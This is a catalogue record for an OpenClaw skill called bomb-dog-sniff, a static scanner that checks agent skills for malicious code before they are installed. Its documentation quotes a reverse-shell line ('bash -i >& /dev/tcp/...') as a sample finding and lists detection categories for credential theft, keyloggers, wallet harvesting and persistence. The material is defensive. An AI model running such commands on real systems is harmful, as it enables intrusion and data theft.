{
  "schemaVersion": "1.0",
  "item": {
    "slug": "skill-bomb-dog-sniff",
    "name": "Bomb Dog Sniff",
    "source": "tencent",
    "type": "skill",
    "category": "安全合规",
    "sourceUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff",
    "canonicalUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff",
    "targetPlatform": "OpenClaw"
  },
  "install": {
    "downloadMode": "redirect",
    "downloadUrl": "/downloads/skill-bomb-dog-sniff",
    "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=skill-bomb-dog-sniff",
    "sourcePlatform": "tencent",
    "targetPlatform": "OpenClaw",
    "installMethod": "Manual import",
    "extraction": "Extract archive",
    "prerequisites": [
      "OpenClaw"
    ],
    "packageFormat": "ZIP package",
    "includedAssets": [
      ".guardianrc.example.json",
      "PERFECTION_SUMMARY.md",
      "SKILL.md",
      "package.json",
      "patterns.js",
      "safe-download.js"
    ],
    "primaryDoc": "SKILL.md",
    "quickSetup": [
      "Download the package from Yavira.",
      "Extract the archive and review SKILL.md first.",
      "Import or place the package into your OpenClaw setup."
    ],
    "agentAssist": {
      "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.",
      "steps": [
        "Download the package from Yavira.",
        "Extract it into a folder your agent can access.",
        "Paste one of the prompts below and point your agent at the extracted folder."
      ],
      "prompts": [
        {
          "label": "New install",
          "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete."
        },
        {
          "label": "Upgrade existing",
          "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run."
        }
      ]
    },
    "sourceHealth": {
      "source": "tencent",
      "status": "healthy",
      "reason": "direct_download_ok",
      "recommendedAction": "download",
      "checkedAt": "2026-04-23T16:43:11.935Z",
      "expiresAt": "2026-04-30T16:43:11.935Z",
      "httpStatus": 200,
      "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
      "contentType": "application/zip",
      "probeMethod": "head",
      "details": {
        "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=4claw-imageboard",
        "contentDisposition": "attachment; filename=\"4claw-imageboard-1.0.1.zip\"",
        "redirectLocation": null,
        "bodySnippet": null
      },
      "scope": "source",
      "summary": "Source download looks usable.",
      "detail": "Yavira can redirect you to the upstream package for this source.",
      "primaryActionLabel": "Download for OpenClaw",
      "primaryActionHref": "/downloads/skill-bomb-dog-sniff"
    },
    "validation": {
      "installChecklist": [
        "Use the Yavira download entry.",
        "Review SKILL.md after the package is downloaded.",
        "Confirm the extracted package contains the expected setup assets (the files listed under includedAssets, with SKILL.md as the primary doc)."
      ],
      "postInstallChecks": [
        "Confirm the extracted package includes the expected docs or setup files.",
        "Validate the skill or prompts are available in your target agent workspace.",
        "Capture any manual follow-up steps the agent could not complete."
      ]
    },
    "downloadPageUrl": "https://openagent3.xyz/downloads/skill-bomb-dog-sniff",
    "agentPageUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent",
    "manifestUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.md"
  },
  "agentAssist": {
    "summary": "Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.",
    "steps": [
      "Download the package from Yavira.",
      "Extract it into a folder your agent can access.",
      "Paste one of the prompts below and point your agent at the extracted folder."
    ],
    "prompts": [
      {
        "label": "New install",
        "body": "I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete."
      },
      {
        "label": "Upgrade existing",
        "body": "I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run."
      }
    ]
  },
  "documentation": {
    "source": "clawhub",
    "primaryDoc": "SKILL.md",
    "sections": [
      {
        "title": "bomb-dog-sniff v1.2.0 🐕",
        "body": "Like a bomb-sniffing dog for OpenClaw skills\n\nSniff out malicious skills before they explode in your system. Quarantine → Scan → Install only the safe ones."
      },
      {
        "title": "Security Hardening",
        "body": "Fixed command injection vulnerabilities in download functions\nAdded path traversal protection - Sanitizes all path inputs\nSecure quarantine - Randomized directory names with restricted permissions\nBinary file detection - Skips binary files to avoid false positives\nFile size limits - Prevents DoS via huge files\nReDoS protection - Limits regex processing on long lines"
      },
      {
        "title": "Detection Improvements",
        "body": "Smart false positive reduction - Better context-aware pattern matching\nEntropy analysis - Detects encoded/encrypted payloads\nTest file awareness - Reduces severity for findings in test files\nConfidence scoring - Each finding has confidence level (high/medium/low)\n13 detection categories - Added supply chain, prototype pollution, and malicious script detection"
      },
      {
        "title": "New Patterns",
        "body": "Supply chain attack indicators (typosquatting, dynamic requires)\nPrototype pollution vulnerabilities\nMalicious npm/yarn scripts\nBrowser credential theft\nSSH key theft\nSystemd persistence mechanisms"
      },
      {
        "title": "Quick Start",
        "body": "# Sniff out threats before installing\nopenclaw skill bomb-dog-sniff scan ./downloaded-skill\n\n# Safe install from clawhub (auto-downloads, sniffs, installs if clean)\nopenclaw skill bomb-dog-sniff safe-install cool-skill\n\n# Audit an already-installed skill\nopenclaw skill bomb-dog-sniff audit bird\n\n# Batch scan multiple skills\nopenclaw skill bomb-dog-sniff batch skills-to-audit.txt"
      },
      {
        "title": "scan",
        "body": "Scan a skill directory for malicious patterns.\n\nopenclaw skill bomb-dog-sniff scan <path> [options]\n\nOptions:\n  -j, --json          Output JSON only\n  -v, --verbose       Show detailed findings\n  -t, --threshold N   Set risk threshold (default: 40)\n  -h, --help          Show help\n\nExample:\n\nopenclaw skill bomb-dog-sniff scan ./untrusted-skill\nopenclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json\n\nOutput:\n\n🔍 Bomb-Dog-Sniff Security Scanner v1.2.0\nTarget: /home/user/skills/untrusted-skill\n\n🔴 CRITICAL (2)\n──────────────────────────────────────────────────\n  crypto_harvester: scripts/wallet.js:23\n    Crypto wallet private key harvesting detected\n    Code: const privateKey = \"a1b2c3...\"\n    Confidence: high\n\n  reverse_shell: scripts/backdoor.sh:5\n    Reverse shell or remote code execution detected\n    Code: bash -i >& /dev/tcp/192.168.1.100/4444\n    Confidence: high\n\n🟠 HIGH (1)\n──────────────────────────────────────────────────\n  pipe_bash: install.sh:12\n    Dangerous curl | bash pattern detected\n    Confidence: high\n\n═══════════════════════════════════════════════════\nSCAN SUMMARY\n═══════════════════════════════════════════════════\n☠️ Risk Score: 75/100\n   Risk Level: MALICIOUS\n   Duration: 125ms\n   Files Scanned: 12/15\n   Files Skipped: 3 (binary/empty/large)\n   Findings: 3\n\n   Severity Breakdown:\n     🔴 CRITICAL: 2\n     🟠 HIGH: 1\n\n📋 Recommendation:\n   MALICIOUS - Do not install. Found 3 critical security issues.\n\nScan ID: bds-20260208-a1b2c3d4"
      },
      {
        "title": "safe-install",
        "body": "Download from clawhub/GitHub, scan, and install only if safe.\n\nopenclaw skill bomb-dog-sniff safe-install <source> [options]\n\nSource:\n  - ClawHub skill name: bird\n  - GitHub URL: https://github.com/user/skill\n  - Local path: ./local-skill\n\nOptions:\n  --threshold N   Set risk threshold (default: 39)\n  --dry-run       Scan only, don't install\n  --verbose       Show all findings\n\nExample:\n\n# Install with default threshold (39)\nopenclaw skill bomb-dog-sniff safe-install bird\n\n# Stricter threshold\nopenclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20\n\n# Scan only (dry run)\nopenclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run\n\n# GitHub source\nopenclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill"
      },
      {
        "title": "audit",
        "body": "Audit an already-installed skill.\n\nopenclaw skill bomb-dog-sniff audit <skill-name> [options]\n\nExample:\n\nopenclaw skill bomb-dog-sniff audit notion"
      },
      {
        "title": "batch",
        "body": "Scan multiple skills from a list file.\n\nopenclaw skill bomb-dog-sniff batch <list-file>\n\nExample list file (skills.txt):\n\n# My installed skills to audit\nbird\nnotion\ngog\nslack\n./custom-skill\n\n# Commented lines are ignored\n# old-skill\n\nRun:\n\nopenclaw skill bomb-dog-sniff batch skills.txt"
      },
      {
        "title": "Detection Categories",
        "body": "bomb-dog-sniff scans for these threat categories:\n\nCategory\tSeverity\tExamples Detected\ncrypto_harvester\tCRITICAL\tPrivate key extraction, wallet exports, mnemonic theft\ncredential_theft\tCRITICAL\tEnvironment variable exfiltration, config file theft, SSH key theft\nreverse_shell\tCRITICAL\tNetcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote code\nkeylogger\tCRITICAL\tKeyboard capture with exfiltration, clipboard theft, password field monitoring\nencoded_payload\tHIGH\tBase64 execution chains, hex escapes with eval context, obfuscated code\nsuspicious_api\tHIGH\tPastebin/ngrok/webhook destinations, dynamic URL construction with secrets\npipe_bash\tHIGH\tcurl | bash, wget | sh patterns\ndeposit_scam\tHIGH\t\"Send ETH to 0x...\", payment prompts in unexpected contexts\nsupply_chain\tHIGH\tTyposquatting, dynamic requires, suspicious postinstall scripts\nprototype_pollution\tHIGH\tDangerous object merging, __proto__ manipulation\nmalicious_script\tCRITICAL\tPre/postinstall doing network/exec operations, modifying other packages\nnetwork_exfil\tMEDIUM\tFile reading followed by network transmission\nfile_tamper\tCRITICAL\t.bashrc modification, crontab editing, SSH authorized_keys manipulation"
      },
      {
        "title": "Risk Scoring",
        "body": "0-19   SAFE        ✅ Install freely\n20-39  LOW         ⚠️  Review recommended\n40-69  SUSPICIOUS  🚫 Blocked by default\n70-100 MALICIOUS   ☠️  Never install\n\nEach finding adds to the score:\n\nCRITICAL: +25 points (× confidence multiplier)\nHIGH: +15 points (× confidence multiplier)\nMEDIUM: +5 points (× confidence multiplier)\n\nConfidence multipliers:\n\nHigh confidence: 1.0×\nMedium confidence: 0.75×\nLow confidence: 0.5×\n\nScore caps at 100."
      },
      {
        "title": "Safe Install Process",
        "body": "1. QUARANTINE\n   └── Skill downloaded to /tmp/bds-q-<random>/\n   └── Randomized, non-predictable directory name\n   └── Restricted permissions (0o700)\n   \n2. SCAN\n   ├── Check all files against detection patterns\n   ├── Skip binary files, empty files, files >10MB\n   ├── Calculate entropy for encoded payload detection\n   ├── Apply confidence multipliers\n   └── Generate findings report\n   \n3. DECISION\n   ├── Risk > threshold? → BLOCK & DELETE\n   └── Risk ≤ threshold? → PROCEED\n   \n4. INSTALL (if passed)\n   └── Move from quarantine to skills directory\n   └── Backup existing installation (max 5 backups)\n   \n5. CLEANUP\n   └── Securely remove quarantine directory"
      },
      {
        "title": "Scanning Details",
        "body": "Static analysis only - No code execution\nMulti-pattern matching - 60+ detection patterns\nLine-level reporting - Exact file:line for each finding\nFalse positive reduction - Context-aware pattern matching\nBinary detection - Automatically skips binary files\nSymlink loop protection - Tracks visited inodes\nDepth limiting - Max 20 directory levels\nTest file handling - Reduces severity for test files"
      },
      {
        "title": "Environment Variables",
        "body": "# Set custom skills directory\nexport OPENCLAW_SKILLS_DIR=/path/to/skills\n\n# Set default risk threshold\nexport BOMB_DOG_THRESHOLD=25"
      },
      {
        "title": "Per-Skill Configuration",
        "body": "Add to your skill's package.json:\n\n{\n  \"bomb-dog-sniff\": {\n    \"riskThreshold\": 25,\n    \"excludedCategories\": [\"network_exfil\"]\n  }\n}"
      },
      {
        "title": "CI/CD Integration",
        "body": "Add to your CI pipeline:\n\n# .github/workflows/skill-security.yml\nname: Skill Security Scan\n\non: [push, pull_request]\n\njobs:\n  scan:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v3\n      \n      - name: Scan skills\n        run: |\n          for skill in skills/*/; do\n            echo \"Scanning $skill\"\n            node skills/bomb-dog-sniff/scan.js \"$skill\" || exit 1\n          done\n\nExit codes:\n\n0 - Safe (score below threshold)\n1 - Error/invalid arguments\n2 - Risky (score ≥ threshold)"
      },
      {
        "title": "Programmatic API",
        "body": "const { scanSkill } = require('./scan');\nconst { safeDownload } = require('./safe-download');\n\n// Scan a skill\nconst report = scanSkill('./path/to/skill', { verbose: true });\nconsole.log(`Risk score: ${report.riskScore}`);\nconsole.log(`Findings: ${report.findings.length}`);\n\n// Safe download and install\nconst result = await safeDownload('cool-skill', {\n  autoInstall: true,\n  riskThreshold: 30,\n});\n\nif (!result.success) {\n  console.error('Installation blocked:', result.reason);\n}"
      },
      {
        "title": "Security Limits",
        "body": "To prevent DoS and ensure scanner security:\n\nLimit\tValue\tPurpose\nMax file size\t10MB\tPrevent memory exhaustion\nMax line length\t10KB\tPrevent ReDoS attacks\nMax files per scan\t10,000\tPrevent resource exhaustion\nMax findings per file\t100\tPrevent output flooding\nMax total findings\t500\tPrevent result flooding\nMax directory depth\t20\tPrevent infinite recursion\nDownload timeout\t2 minutes\tPrevent hanging downloads\nMax download size\t50MB\tPrevent disk exhaustion"
      },
      {
        "title": "False Positives",
        "body": "If legitimate code triggers a warning:\n\nCheck confidence level - Low confidence findings are more likely to be false positives\nReview the excerpt - Look at the actual code flagged\nTest files are noted - Findings in *.test.js or __tests__/ have reduced severity\nComments are generally skipped - Unless they contain suspicious keywords\n\nTo report false positives, please include:\n\nThe file content that triggered the false positive\nThe pattern category that matched\nExpected behavior"
      },
      {
        "title": "Best Practices",
        "body": "Always scan before installing unknown skills\nUse --dry-run first for untrusted sources\nSet lower threshold (--threshold 20) for critical systems\nAudit regularly - Rescan installed skills periodically\nReview CRITICAL findings - Never ignore critical severity warnings\nCheck confidence levels - High confidence = higher priority"
      },
      {
        "title": "Files",
        "body": "SKILL.md - This documentation\nscan.js - Core scanner engine\npatterns.js - Detection pattern definitions\nsafe-download.js - Safe download & install logic\nscripts/sniff.sh - CLI wrapper\npackage.json - Package configuration\nQUICKSTART.md - Quick reference guide"
      },
      {
        "title": "Security Notes",
        "body": "⚠️ Limitations:\n\nStatic analysis only (some obfuscation may evade detection)\nPattern-based (novel attacks may not be detected)\nNot a replacement for manual code review on critical systems\nCannot detect runtime-only malicious behavior\n\n✅ Recommendations:\n\nUse bomb-dog-sniff as first line of defense\nReview code manually for high-security environments\nKeep patterns.js updated with new threat signatures\nReport false positives and missed detections\nCombine with other security tools for defense in depth"
      },
      {
        "title": "v1.2.0 (Hardened Edition)",
        "body": "SECURITY: Fixed command injection vulnerabilities in safe-download.js\nSECURITY: Added path traversal protection\nSECURITY: Secure randomized quarantine directories\nFEATURE: Binary file detection and skipping\nFEATURE: File size limits (10MB per file, 50MB download)\nFEATURE: Entropy analysis for encoded payload detection\nFEATURE: Confidence scoring for all findings\nFEATURE: Test file awareness with severity reduction\nFEATURE: 3 new detection categories (supply_chain, prototype_pollution, malicious_script)\nIMPROVEMENT: Better false positive reduction with context-aware matching\nIMPROVEMENT: ReDoS protection via line length limits\nIMPROVEMENT: Symlink loop protection\nIMPROVEMENT: Backup rotation (max 5 backups)"
      },
      {
        "title": "v1.1.0",
        "body": "Added safe-install command with quarantine workflow\nAdded audit command for installed skills\nAdded batch command for multiple skill scanning\nEnhanced detection patterns (50+ signatures)\nAdded risk threshold configuration"
      },
      {
        "title": "v1.0.0",
        "body": "Initial release with basic scanning\n10 detection categories\nJSON output format"
      },
      {
        "title": "License",
        "body": "MIT - See LICENSE file\n\nStay safe. Scan everything. Trust verified skills only. 🦞🐕"
      }
    ],
    "body": "bomb-dog-sniff v1.2.0 🐕\n\nLike a bomb-sniffing dog for OpenClaw skills\n\nSniff out malicious skills before they explode in your system. Quarantine → Scan → Install only the safe ones.\n\nWhat's New in v1.2.0\nSecurity Hardening\nFixed command injection vulnerabilities in download functions\nAdded path traversal protection - Sanitizes all path inputs\nSecure quarantine - Randomized directory names with restricted permissions\nBinary file detection - Skips binary files to avoid false positives\nFile size limits - Prevents DoS via huge files\nReDoS protection - Limits regex processing on long lines\nDetection Improvements\nSmart false positive reduction - Better context-aware pattern matching\nEntropy analysis - Detects encoded/encrypted payloads\nTest file awareness - Reduces severity for findings in test files\nConfidence scoring - Each finding has confidence level (high/medium/low)\n13 detection categories - Added supply chain, prototype pollution, and malicious script detection\nNew Patterns\nSupply chain attack indicators (typosquatting, dynamic requires)\nPrototype pollution vulnerabilities\nMalicious npm/yarn scripts\nBrowser credential theft\nSSH key theft\nSystemd persistence mechanisms\nQuick Start\n# Sniff out threats before installing\nopenclaw skill bomb-dog-sniff scan ./downloaded-skill\n\n# Safe install from clawhub (auto-downloads, sniffs, installs if clean)\nopenclaw skill bomb-dog-sniff safe-install cool-skill\n\n# Audit an already-installed skill\nopenclaw skill bomb-dog-sniff audit bird\n\n# Batch scan multiple skills\nopenclaw skill bomb-dog-sniff batch skills-to-audit.txt\n\nCommands\nscan\n\nScan a skill directory for malicious patterns.\n\nopenclaw skill bomb-dog-sniff scan <path> [options]\n\nOptions:\n  -j, --json          Output JSON only\n  -v, --verbose       Show detailed findings\n  -t, --threshold N   Set risk threshold (default: 40)\n  -h, --help          Show help\n\n\nExample:\n\nopenclaw skill bomb-dog-sniff scan 
./untrusted-skill\nopenclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json\n\n\nOutput:\n\n🔍 Bomb-Dog-Sniff Security Scanner v1.2.0\nTarget: /home/user/skills/untrusted-skill\n\n🔴 CRITICAL (2)\n──────────────────────────────────────────────────\n  crypto_harvester: scripts/wallet.js:23\n    Crypto wallet private key harvesting detected\n    Code: const privateKey = \"a1b2c3...\"\n    Confidence: high\n\n  reverse_shell: scripts/backdoor.sh:5\n    Reverse shell or remote code execution detected\n    Code: bash -i >& /dev/tcp/192.168.1.100/4444\n    Confidence: high\n\n🟠 HIGH (1)\n──────────────────────────────────────────────────\n  pipe_bash: install.sh:12\n    Dangerous curl | bash pattern detected\n    Confidence: high\n\n═══════════════════════════════════════════════════\nSCAN SUMMARY\n═══════════════════════════════════════════════════\n☠️ Risk Score: 75/100\n   Risk Level: MALICIOUS\n   Duration: 125ms\n   Files Scanned: 12/15\n   Files Skipped: 3 (binary/empty/large)\n   Findings: 3\n\n   Severity Breakdown:\n     🔴 CRITICAL: 2\n     🟠 HIGH: 1\n\n📋 Recommendation:\n   MALICIOUS - Do not install. 
Found 3 critical security issues.\n\nScan ID: bds-20260208-a1b2c3d4\n\nsafe-install\n\nDownload from clawhub/GitHub, scan, and install only if safe.\n\nopenclaw skill bomb-dog-sniff safe-install <source> [options]\n\nSource:\n  - ClawHub skill name: bird\n  - GitHub URL: https://github.com/user/skill\n  - Local path: ./local-skill\n\nOptions:\n  --threshold N   Set risk threshold (default: 39)\n  --dry-run       Scan only, don't install\n  --verbose       Show all findings\n\n\nExample:\n\n# Install with default threshold (39)\nopenclaw skill bomb-dog-sniff safe-install bird\n\n# Stricter threshold\nopenclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20\n\n# Scan only (dry run)\nopenclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run\n\n# GitHub source\nopenclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill\n\naudit\n\nAudit an already-installed skill.\n\nopenclaw skill bomb-dog-sniff audit <skill-name> [options]\n\n\nExample:\n\nopenclaw skill bomb-dog-sniff audit notion\n\nbatch\n\nScan multiple skills from a list file.\n\nopenclaw skill bomb-dog-sniff batch <list-file>\n\n\nExample list file (skills.txt):\n\n# My installed skills to audit\nbird\nnotion\ngog\nslack\n./custom-skill\n\n# Commented lines are ignored\n# old-skill\n\n\nRun:\n\nopenclaw skill bomb-dog-sniff batch skills.txt\n\nDetection Categories\n\nbomb-dog-sniff scans for these threat categories:\n\nCategory\tSeverity\tExamples Detected\ncrypto_harvester\tCRITICAL\tPrivate key extraction, wallet exports, mnemonic theft\ncredential_theft\tCRITICAL\tEnvironment variable exfiltration, config file theft, SSH key theft\nreverse_shell\tCRITICAL\tNetcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote code\nkeylogger\tCRITICAL\tKeyboard capture with exfiltration, clipboard theft, password field monitoring\nencoded_payload\tHIGH\tBase64 execution chains, hex escapes with eval context, obfuscated 
code\nsuspicious_api\tHIGH\tPastebin/ngrok/webhook destinations, dynamic URL construction with secrets\npipe_bash\tHIGH\tcurl | bash, wget | sh patterns\ndeposit_scam\tHIGH\t\"Send ETH to 0x...\", payment prompts in unexpected contexts\nsupply_chain\tHIGH\tTyposquatting, dynamic requires, suspicious postinstall scripts\nprototype_pollution\tHIGH\tDangerous object merging, __proto__ manipulation\nmalicious_script\tCRITICAL\tPre/postinstall doing network/exec operations, modifying other packages\nnetwork_exfil\tMEDIUM\tFile reading followed by network transmission\nfile_tamper\tCRITICAL\t.bashrc modification, crontab editing, SSH authorized_keys manipulation\nRisk Scoring\n0-19   SAFE        ✅ Install freely\n20-39  LOW         ⚠️  Review recommended\n40-69  SUSPICIOUS  🚫 Blocked by default\n70-100 MALICIOUS   ☠️  Never install\n\n\nEach finding adds to the score:\n\nCRITICAL: +25 points (× confidence multiplier)\nHIGH: +15 points (× confidence multiplier)\nMEDIUM: +5 points (× confidence multiplier)\n\nConfidence multipliers:\n\nHigh confidence: 1.0×\nMedium confidence: 0.75×\nLow confidence: 0.5×\n\nScore caps at 100.\n\nHow It Works\nSafe Install Process\n1. QUARANTINE\n   └── Skill downloaded to /tmp/bds-q-<random>/\n   └── Randomized, non-predictable directory name\n   └── Restricted permissions (0o700)\n   \n2. SCAN\n   ├── Check all files against detection patterns\n   ├── Skip binary files, empty files, files >10MB\n   ├── Calculate entropy for encoded payload detection\n   ├── Apply confidence multipliers\n   └── Generate findings report\n   \n3. DECISION\n   ├── Risk > threshold? → BLOCK & DELETE\n   └── Risk ≤ threshold? → PROCEED\n   \n4. INSTALL (if passed)\n   └── Move from quarantine to skills directory\n   └── Backup existing installation (max 5 backups)\n   \n5. 
CLEANUP\n   └── Securely remove quarantine directory\n\nScanning Details\nStatic analysis only - No code execution\nMulti-pattern matching - 60+ detection patterns\nLine-level reporting - Exact file:line for each finding\nFalse positive reduction - Context-aware pattern matching\nBinary detection - Automatically skips binary files\nSymlink loop protection - Tracks visited inodes\nDepth limiting - Max 20 directory levels\nTest file handling - Reduces severity for test files\nConfiguration\nEnvironment Variables\n# Set custom skills directory\nexport OPENCLAW_SKILLS_DIR=/path/to/skills\n\n# Set default risk threshold\nexport BOMB_DOG_THRESHOLD=25\n\nPer-Skill Configuration\n\nAdd to your skill's package.json:\n\n{\n  \"bomb-dog-sniff\": {\n    \"riskThreshold\": 25,\n    \"excludedCategories\": [\"network_exfil\"]\n  }\n}\n\nCI/CD Integration\n\nAdd to your CI pipeline:\n\n# .github/workflows/skill-security.yml\nname: Skill Security Scan\n\non: [push, pull_request]\n\njobs:\n  scan:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/checkout@v3\n      \n      - name: Scan skills\n        run: |\n          for skill in skills/*/; do\n            echo \"Scanning $skill\"\n            node skills/bomb-dog-sniff/scan.js \"$skill\" || exit 1\n          done\n\n\nExit codes:\n\n0 - Safe (score below threshold)\n1 - Error/invalid arguments\n2 - Risky (score ≥ threshold)\nProgrammatic API\nconst { scanSkill } = require('./scan');\nconst { safeDownload } = require('./safe-download');\n\n// Scan a skill\nconst report = scanSkill('./path/to/skill', { verbose: true });\nconsole.log(`Risk score: ${report.riskScore}`);\nconsole.log(`Findings: ${report.findings.length}`);\n\n// Safe download and install\nconst result = await safeDownload('cool-skill', {\n  autoInstall: true,\n  riskThreshold: 30,\n});\n\nif (!result.success) {\n  console.error('Installation blocked:', result.reason);\n}\n\nSecurity Limits\n\nTo prevent DoS and ensure scanner 
security:\n\nLimit\tValue\tPurpose\nMax file size\t10MB\tPrevent memory exhaustion\nMax line length\t10KB\tPrevent ReDoS attacks\nMax files per scan\t10,000\tPrevent resource exhaustion\nMax findings per file\t100\tPrevent output flooding\nMax total findings\t500\tPrevent result flooding\nMax directory depth\t20\tPrevent infinite recursion\nDownload timeout\t2 minutes\tPrevent hanging downloads\nMax download size\t50MB\tPrevent disk exhaustion\nFalse Positives\n\nIf legitimate code triggers a warning:\n\nCheck confidence level - Low confidence findings are more likely to be false positives\nReview the excerpt - Look at the actual code flagged\nTest files are noted - Findings in *.test.js or __tests__/ have reduced severity\nComments are generally skipped - Unless they contain suspicious keywords\n\nTo report false positives, please include:\n\nThe file content that triggered the false positive\nThe pattern category that matched\nExpected behavior\nBest Practices\nAlways scan before installing unknown skills\nUse --dry-run first for untrusted sources\nSet lower threshold (--threshold 20) for critical systems\nAudit regularly - Rescan installed skills periodically\nReview CRITICAL findings - Never ignore critical severity warnings\nCheck confidence levels - High confidence = higher priority\nFiles\nSKILL.md - This documentation\nscan.js - Core scanner engine\npatterns.js - Detection pattern definitions\nsafe-download.js - Safe download & install logic\nscripts/sniff.sh - CLI wrapper\npackage.json - Package configuration\nQUICKSTART.md - Quick reference guide\nSecurity Notes\n\n⚠️ Limitations:\n\nStatic analysis only (some obfuscation may evade detection)\nPattern-based (novel attacks may not be detected)\nNot a replacement for manual code review on critical systems\nCannot detect runtime-only malicious behavior\n\n✅ Recommendations:\n\nUse bomb-dog-sniff as first line of defense\nReview code manually for high-security environments\nKeep patterns.js updated with new 
threat signatures\nReport false positives and missed detections\nCombine with other security tools for defense in depth\nChangelog\nv1.2.0 (Hardened Edition)\nSECURITY: Fixed command injection vulnerabilities in safe-download.js\nSECURITY: Added path traversal protection\nSECURITY: Secure randomized quarantine directories\nFEATURE: Binary file detection and skipping\nFEATURE: File size limits (10MB per file, 50MB download)\nFEATURE: Entropy analysis for encoded payload detection\nFEATURE: Confidence scoring for all findings\nFEATURE: Test file awareness with severity reduction\nFEATURE: 3 new detection categories (supply_chain, prototype_pollution, malicious_script)\nIMPROVEMENT: Better false positive reduction with context-aware matching\nIMPROVEMENT: ReDoS protection via line length limits\nIMPROVEMENT: Symlink loop protection\nIMPROVEMENT: Backup rotation (max 5 backups)\nv1.1.0\nAdded safe-install command with quarantine workflow\nAdded audit command for installed skills\nAdded batch command for multiple skill scanning\nEnhanced detection patterns (50+ signatures)\nAdded risk threshold configuration\nv1.0.0\nInitial release with basic scanning\n10 detection categories\nJSON output format\nLicense\n\nMIT - See LICENSE file\n\nStay safe. Scan everything. Trust verified skills only. 🦞🐕"
  },
  "trust": {
    "sourceLabel": "tencent",
    "provenanceUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff",
    "publisherUrl": "https://clawhub.ai/LvcidPsyche/skill-bomb-dog-sniff",
    "owner": "LvcidPsyche",
    "version": "0.1.0",
    "license": null,
    "verificationStatus": "Indexed source record"
  },
  "links": {
    "detailUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff",
    "downloadUrl": "https://openagent3.xyz/downloads/skill-bomb-dog-sniff",
    "agentUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent",
    "manifestUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/skill-bomb-dog-sniff/agent.md"
  }
}